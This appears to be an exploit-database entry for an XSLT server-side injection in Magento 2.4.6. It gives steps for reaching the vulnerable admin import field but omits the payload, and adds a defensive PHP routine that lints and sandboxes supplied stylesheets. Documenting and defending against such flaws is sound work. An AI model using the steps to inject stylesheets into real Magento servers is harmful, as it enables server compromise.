Magento ver. 2.4.6 XSLT server-side injection Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2024-03-03 | Type: webapps | Platform: multiple
This exploit / vulnerability (Magento ver. 2.4.6 XSLT server-side injection) is for educational purposes only; if you use it, you do so at your own risk!
1. Log in with admin credentials at this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. For Import Source, choose File
4. Click `XSLT Configuration` and write this payload:
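
Added defensive example (not the payload, and not code from the original entry, Magento, or the import extension): since the `XSLT Configuration` field in the steps above takes a stylesheet that the server then processes, one mitigation is to lint the stylesheet against an allowlist and run the transform with extensions and file/network access disabled. It assumes the transform is done with PHP's `XSLTProcessor`; `lintStylesheet`, `safeTransform`, and the sample stylesheet are hypothetical names and constructed input.

```php
<?php
const ALLOWED_NS = ['http://www.w3.org/1999/XSL/Transform',
                    'http://www.w3.org/XML/1998/namespace'];

/** Reasons to reject an operator-supplied stylesheet; empty array = accepted. */
function lintStylesheet(string $xslt): array
{
    $doc = new DOMDocument();
    // LIBXML_NONET: the parser never fetches anything over the network.
    if ($xslt === '' || !@$doc->loadXML($xslt, LIBXML_NONET)) {
        return ['not well-formed XML'];
    }
    $problems = $doc->doctype ? ['DOCTYPE not allowed'] : [];
    $xp = new DOMXPath($doc);
    $xp->registerNamespace('x', ALLOWED_NS[0]);
    // Allowlist namespaces: anything besides XSLT itself is an extension hook.
    foreach ($xp->query('//namespace::*') as $ns) {
        if (!in_array($ns->nodeValue, ALLOWED_NS, true)) {
            $problems[] = "namespace not allowed: {$ns->nodeValue}";
        }
    }
    // No pulling in other stylesheets or documents from disk or network.
    foreach ($xp->query('//x:include | //x:import') as $el) {
        $problems[] = "external reference: {$el->nodeName}";
    }
    foreach ($xp->query('//@*[contains(., "document(")]') as $attr) {
        $problems[] = "document() used in @{$attr->nodeName}";
    }
    return array_values(array_unique($problems));
}

/** Transform only after linting, with extensions off and file/network I/O denied. */
function safeTransform(string $xslt, string $xml): string
{
    if ($problems = lintStylesheet($xslt)) {
        throw new InvalidArgumentException(implode('; ', $problems));
    }
    $style = new DOMDocument();
    $style->loadXML($xslt, LIBXML_NONET);
    $input = new DOMDocument();
    $input->loadXML($xml, LIBXML_NONET);
    $proc = new XSLTProcessor();          // registerPHPFunctions() is never called
    $proc->setSecurityPrefs(XSL_SECPREF_READ_FILE | XSL_SECPREF_WRITE_FILE
        | XSL_SECPREF_CREATE_DIRECTORY | XSL_SECPREF_READ_NETWORK | XSL_SECPREF_WRITE_NETWORK);
    $proc->importStylesheet($style);
    $out = $proc->transformToXml($input);
    return is_string($out) ? $out : throw new RuntimeException('transform failed');
}
// Constructed sample: a stylesheet declaring a made-up extension namespace is refused.
$sample = '<x:stylesheet version="1.0" xmlns:x="http://www.w3.org/1999/XSL/Transform"'
        . ' xmlns:ext="urn:example:extension"><x:template match="/"/></x:stylesheet>';
print_r(lintStylesheet($sample));
```

The throw expression in `safeTransform` requires PHP 8.0 or later.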